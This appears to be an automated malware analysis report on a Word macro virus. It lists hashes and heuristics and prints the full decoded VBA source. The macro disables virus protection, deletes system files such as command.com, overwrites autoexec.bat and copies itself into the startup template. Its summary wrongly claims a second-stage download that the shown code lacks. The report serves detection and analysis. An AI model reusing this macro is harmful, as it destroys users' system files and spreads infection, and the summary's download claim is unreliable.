Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a1f883b558bc6a66…

MALICIOUS

Office (OLE)

Size: 38.0 KB
Created: 2000-04-25 05:35:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 93d42ccd810e202e31a4b470e5582294
SHA-1: 3cb881a072a20f5882f5ad08e06284c3758209a2
SHA-256: a1f883b558bc6a666ec2f6f4d9d2f3bdb55c754e503a56a9b8033cb2216e734b
Risk score: 80

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, indicating it is designed to execute malicious code as soon as the document is opened. The script attempts to disable Word's macro virus protection, then deletes existing files and writes a new 'autoexec.bat' file. This suggests the macro is intended to download and execute a second-stage payload, likely disguised as 'winfile.exe', in the Windows directory.

Heuristics (3)

  • VBA macros detected (severity: medium; 1 related finding; rule: OLE_VBA_MACROS)
    Document contains VBA macro code.
  • AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN)
    Document contains an AutoOpen macro.
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8728 bytes
SHA-256: d212bfb9fe8ed4ee6b0e6040c906801f5cae74fe99ae3b31c2a2187c97a4138c

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Private Sub CommandButton1_Click()

End Sub

Attribute VB_Name = "Módulo1"
Private Declare Function Donde_esta_Windowsdirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

Sub AutoOpen()
On Error GoTo RutinaDeError
Options.VirusProtection = False
System.ProfileString("Options", "EnableMacroVirusProtection") = "0"
ShowVisualBasicEditor = False
Dim DirName As String
Dim Shinji As String
    DirName = Donde_esta_Windows()
    Shinji = DirName
Kill (Shinji + "winfile.exe")
Kill (Shinji + "command.com")
Kill (Shinji + "SYSTEM\APPWIZ.cpl")
Open "c:\autoexec.bat" For Output As #1
Print #1, "@echo off"
Print #1, "cls"
Print #1, "ECHO          *********************************************************"
Print #1, "ECHO          *                                                       *"
Print #1, "ECHO          *                  ViRuS: ASUKA  ANTI - T               *"
Print #1, "ECHO          *                                                       *"
Print #1, "ECHO          *                         AUTOR:                        *"
Print #1, "ECHO          *                                                       *"
Print #1, "ECHO          *                  ©©©© DarK OmEGA  ©©©©                *"
Print #1, "ECHO          *                                                       *"
Print #1, "ECHO          *                      LIMA - PERU                      *"
Print #1, "ECHO          *                                                       *"
Print #1, "ECHO          *                       16/FEB/00                       *"
Print #1, "ECHO          *                                                       *"
Print #1, "ECHO          *                     ®®®®®®®®®®®®®®                    *"
Print #1, "ECHO          *                     §            §                    *"
Print #1, "ECHO          *                     §   A.B.G    §                    *"
Print #1, "ECHO          *********************************************************"
Print #1, "pause"
Close #1
ActiveDocument.SaveAs FileName:=Application.StartupPath & "\word8.dot", FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
RutinaDeError:
Exit Sub
End Sub

Function Donde_esta_Windows() As String
    Dim Temp As String
    Dim Ret As Long
    Const MAX_LENGTH = 145

    Temp = String$(MAX_LENGTH, 0)
    Ret = Donde_esta_Windowsdirectory(Temp, MAX_LENGTH)
    Temp = Left$(Temp, Ret)
    If Temp <> "" And Right$(Temp, 1) <> "\" Then
        Donde_esta_Windows = Temp & "\"
    Else
        Donde_esta_Windows = Temp
    End If
End Function

' Processing file: /opt/analyzer/scan_staging/d06a2e69e2c64133beb83a7f527c2962.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1143 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Private Sub CommandButton1_Click())
' Line #2:
' Line #3:
' 	EndSub 
' Macros/VBA/Módulo1 - 6238 bytes
' Line #0:
' 	FuncDefn (Private Declare Function Donde_esta_Windowsdirectory Lib "kernel32" (ByVal lpBuffer As String, ByVal nSize As Long) As Long)
' Line #1:
' Line #2:
' 	FuncDefn (Sub AutoOpen())
' Line #3:
' 	OnError RutinaDeError 
' Line #4:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #5:
' 	LitStr 0x0001 "0"
' 	LitStr 0x0007 "Options"
' 	LitStr 0x001A "EnableMacroVirusProtection"
' 	Ld System 
' 	ArgsMemSt ProfileString 0x0002 
' Line #6:
' 	LitVarSpecial (False)
' 	St ShowVisualBasicEditor 
' Line #7:
' 	Dim 
' 	VarDefn DirName (As String)
' Line #8:
' 	Dim 
' 	VarDefn Shinji (As String)
' Line #9:
' 	ArgsLd Donde_esta_Windows 0x0000 
' 	St DirName 
' Line #10:
' 	Ld DirName 
' 	St Shinji 
' Line #11:
' 	Ld Shinji 
' 	LitStr 0x000B "winfile.e
... (truncated)